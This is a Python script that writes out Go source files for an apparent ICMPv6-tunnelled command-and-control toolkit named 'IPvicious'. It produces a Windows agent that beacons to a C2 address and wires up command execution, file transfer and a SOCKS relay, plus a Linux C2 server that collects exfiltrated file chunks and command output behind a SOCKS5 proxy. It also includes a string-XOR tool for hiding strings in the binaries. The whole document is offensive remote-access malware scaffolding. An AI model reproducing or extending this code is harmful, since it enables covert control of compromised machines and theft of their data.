import os, sys

BASE = '/Users/julien/Documents/IPvicious'

def w(rel, content):
    path = os.path.join(BASE, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as f:
        f.write(content)
    print('wrote', rel)

# ── cmd/client/main.go ────────────────────────────────────────────────────────
w('cmd/client/main.go', '//go:build windows\n\n'
'// cmd/client is the Windows agent entry point.\n'
'//\n'
'// Compile-time defaults (override with ldflags):\n'
'//   go build -ldflags "-X main.defaultC2=2001:db8::1 -X main.defaultPollMs=50"\n'
'//\n'
'// Runtime flags:\n'
'//   agent.exe -c2 2001:db8::1 -poll 50\n'
'package main\n\n'
'import (\n'
'\t"flag"\n'
'\t"log"\n'
'\t"net"\n'
'\t"os"\n'
'\t"os/signal"\n'
'\t"strconv"\n'
'\t"syscall"\n\n'
'\t"ipvicious/internal/agent"\n'
'\t"ipvicious/internal/tunnel"\n'
')\n\n'
'// Compile-time defaults; overridable at link time.\n'
'var defaultC2     = "::1"\n'
'var defaultPollMs = "50"\n\n'
'func main() {\n'
'\tc2Flag   := flag.String("c2",   defaultC2,             "C2 IPv6 address")\n'
'\tpollFlag := flag.Int(  "poll",  mustAtoi(defaultPollMs), "poll interval ms")\n'
'\tflag.Parse()\n\n'
'\tc2IP := net.ParseIP(*c2Flag)\n'
'\tif c2IP == nil {\n'
'\t\tlog.Fatalf("invalid C2 address: %s", *c2Flag)\n'
'\t}\n'
'\tpollMs := uint32(*pollFlag)\n'
'\tif pollMs < 10   { pollMs = 10   }\n'
'\tif pollMs > 5000 { pollMs = 5000 }\n\n'
'\ttun, err := tunnel.NewClientTunnel(c2IP, pollMs)\n'
'\tif err != nil {\n'
'\t\tlog.Fatalf("tunnel init: %v", err)\n'
'\t}\n'
'\tdefer tun.Close()\n\n'
'\t// Wire agent callbacks (cmd exec, file transfer, SOCKS relay).\n'
'\tagent.New(tun)\n\n'
'\tstop := make(chan struct{})\n'
'\tsig  := make(chan os.Signal, 1)\n'
'\tsignal.Notify(sig, syscall.SIGINT, syscall.SIGTERM)\n'
'\tgo func() { <-sig; close(stop) }()\n\n'
'\tlog.Printf("agent started -> %s (poll %dms)", c2IP, pollMs)\n'
'\ttun.Run(stop)\n'
'\tlog.Printf("agent stopped")\n'
'}\n\n'
'func mustAtoi(s string) int {\n'
'\tv, err := strconv.Atoi(s)\n'
'\tif err != nil { panic("invalid default: " + s) }\n'
'\treturn v\n'
'}\n')

# ── cmd/server/main.go ────────────────────────────────────────────────────────
w('cmd/server/main.go', '//go:build linux\n\n'
'// cmd/server is the Linux C2 server entry point.\n'
'//\n'
'// Usage:\n'
'//   sudo ./c2server -socks 127.0.0.1:1080\n'
'//\n'
'// The server requires root (or CAP_NET_RAW) to open a raw ICMPv6 socket.\n'
'package main\n\n'
'import (\n'
'\t"flag"\n'
'\t"log"\n'
'\t"os"\n'
'\t"os/signal"\n'
'\t"syscall"\n\n'
'\t"ipvicious/internal/socks5"\n'
'\t"ipvicious/internal/tunnel"\n'
')\n\n'
'// Compile-time default for the SOCKS5 listen address.\n'
'var defaultSocksAddr = "127.0.0.1:1080"\n\n'
'func main() {\n'
'\tsocksAddr := flag.String("socks", defaultSocksAddr, "SOCKS5 listen address")\n'
'\tflag.Parse()\n\n'
'\t// Create the ICMPv6 tunnel server.\n'
'\ttun, err := tunnel.NewServerTunnel()\n'
'\tif err != nil {\n'
'\t\tlog.Fatalf("tunnel server init: %v", err)\n'
'\t}\n'
'\tdefer tun.Close()\n\n'
'\t// Wire file-transfer callback: print received chunks to stdout.\n'
'\ttun.OnFileData = func(streamID uint32, seqNo uint32, data []byte, last bool) {\n'
'\t\tif len(data) > 0 {\n'
'\t\t\tos.Stdout.Write(data)\n'
'\t\t}\n'
'\t\tif last {\n'
'\t\t\tlog.Printf("[server] file transfer stream %d complete", streamID)\n'
'\t\t}\n'
'\t}\n\n'
'\t// Wire command-output callback: print to stdout.\n'
'\ttun.OnCmdOut = func(streamID uint32, seqNo uint32, output []byte) {\n'
'\t\tos.Stdout.Write(output)\n'
'\t}\n\n'
'\t// Start SOCKS5 proxy.\n'
'\tproxy := socks5.New(tun)\n'
'\tif err := proxy.Listen(*socksAddr); err != nil {\n'
'\t\tlog.Fatalf("socks5: %v", err)\n'
'\t}\n'
'\tdefer proxy.Close()\n\n'
'\t// Start ICMPv6 tunnel (blocking until stop).\n'
'\tstop := make(chan struct{})\n'
'\tsig  := make(chan os.Signal, 1)\n'
'\tsignal.Notify(sig, syscall.SIGINT, syscall.SIGTERM)\n'
'\tgo func() { <-sig; close(stop) }()\n\n'
'\tlog.Printf("C2 server started, SOCKS5 on %s", *socksAddr)\n'
'\ttun.Run(stop)\n'
'\tlog.Printf("C2 server stopped")\n'
'}\n')

# ── tools/strenc/main.go ──────────────────────────────────────────────────────
w('tools/strenc/main.go', '// strenc encrypts one or more strings with the same XOR key used by the\n'
'// crypto package and prints the resulting Go byte-slice literals.\n'
'//\n'
'// Usage:\n'
'//   go run ./tools/strenc "string1" "string2" ...\n'
'//\n'
'// The output can be pasted directly into Go source code.\n'
'package main\n\n'
'import (\n'
'\t"fmt"\n'
'\t"os"\n\n'
'\t"ipvicious/internal/crypto"\n'
')\n\n'
'func main() {\n'
'\tif len(os.Args) < 2 {\n'
'\t\tfmt.Fprintln(os.Stderr, "usage: strenc <string> [string ...]")\n'
'\t\tos.Exit(1)\n'
'\t}\n'
'\tfor _, s := range os.Args[1:] {\n'
'\t\tenc := crypto.Enc(s)\n'
'\t\tfmt.Printf("// %q\\n", s)\n'
'\t\tfmt.Printf("var _ = []byte{")\n'
'\t\tfor i, b := range enc {\n'
'\t\t\tif i > 0 { fmt.Print(", ") }\n'
'\t\t\tfmt.Printf("0x%02X", b)\n'
'\t\t}\n'
'\t\tfmt.Println("}")\n'
'\t}\n'
'}\n')

print("all files written")
